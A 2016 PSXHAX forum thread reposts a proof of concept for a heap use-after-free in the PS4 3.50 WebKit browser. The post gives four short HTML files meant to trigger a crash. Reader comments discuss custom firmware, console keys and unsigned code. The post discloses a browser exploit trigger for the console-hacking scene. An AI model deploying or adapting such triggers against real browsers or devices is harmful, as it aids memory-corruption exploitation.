Join Us and become a Member for a Verified Badge to access private areas with the latest PS4 PKGs.
PS4 Jailbreaking       Thread starter PSXHAX       Start date May 21, 2016 at 3:38 PM       49      
Status
Not open for further replies.
Well that didn't take long since news of the PS4 Webkit Exploit for 3.50 broke, with PlayStation 4 developer Hunter128 stepping up to the plate with the heap use-after-free at WebCore 3.50 proof-of-concept! :)

Without further ado, here's what he had to say to quote: Hello. Appears this needs to be posted public.. Not sure who felt the need to want fame for this cough "Qwerty" but that's the last time i am sharing something special like this.

Anyone hoping for advancements for the PS Vita scene you can blame this guy on why because i am no longer sharing anything.

Anywho make an index.html
Code:
<html>
  <body onload='runTest()'>
    <script>
      function runTest(){
       document.writeln('<html></html>');
      }
    </script>
  <iframe src='1.html'></iframe>
  </body>
</html>
1.html
Code:
<html>
  <iframe src='2.html'></iframe>
  <iframe src='3.html'></iframe>
</html>
2.html
Code:
<html>
  <script>
      window.parent.stop();
  </script>
</html>
3.html
Code:
<html>
</html>
Should cause a out of memory error.

Shoutout to no one.. I have no friends :eek:

Greetz to @Plankton in the PSXHAX Shoutbox today for the news!
PS4 Heap Use-After-Free At WebCore 3.50 PoC.jpg

Comments

Thanks for your answers.
So that means, they could do not create a CFW without these keys. And without these keys you are not able to start a backup too?

Didnt know that is so difficult to get the keys.
Hope someone will find it.

Thanks again :)

Thanks for your answers.
So that means, they could do not create a CFW without these keys. And without these keys you are not able to start a backup too?

Didnt know that is so difficult to get the keys.
Hope someone will find it.

Thanks again :)

Without keys no cfw but i think it is possible to run unsigned code without a cfw look at the 1.76 OFW it is able to run Linux without Keys.

So without keys run unsigned code seems to be possible

Without keys no cfw but i think it is possible to run unsigned code without a cfw look at the 1.76 OFW it is able to run Linux without Keys.

So without keys run unsigned code seems to be possible
You can run unsigned code without keys it is all in how it's done very few know how to do it tho. 1.76 is based around alot of manipulation which is one way of doing it which isn't as simple as it sounds.

Most who use manipulation also know how to dump the keys as there is a specific time they can be dumped. Seems like this is one lesson sony never learns even Samu can't stop this.

I Just tried to copy gameplay footage from my ps4 to a usb and my whole System crashed and i got the error
"An error occurred in the System software (CE-36329-3)"
Is this any good?

Are there people on to create a cfw at the moment?
I do not ask for jailbreak, but i didnt find somethin about a cfw... only exploits (I guess for entry points)

I get a crash once in a while playing Fallout 4 - Happens out of nowhere and I also get "An error occurred in the system software" Sorry I don't have the code but probably can find it in the history later.

Status
Not open for further replies.
Back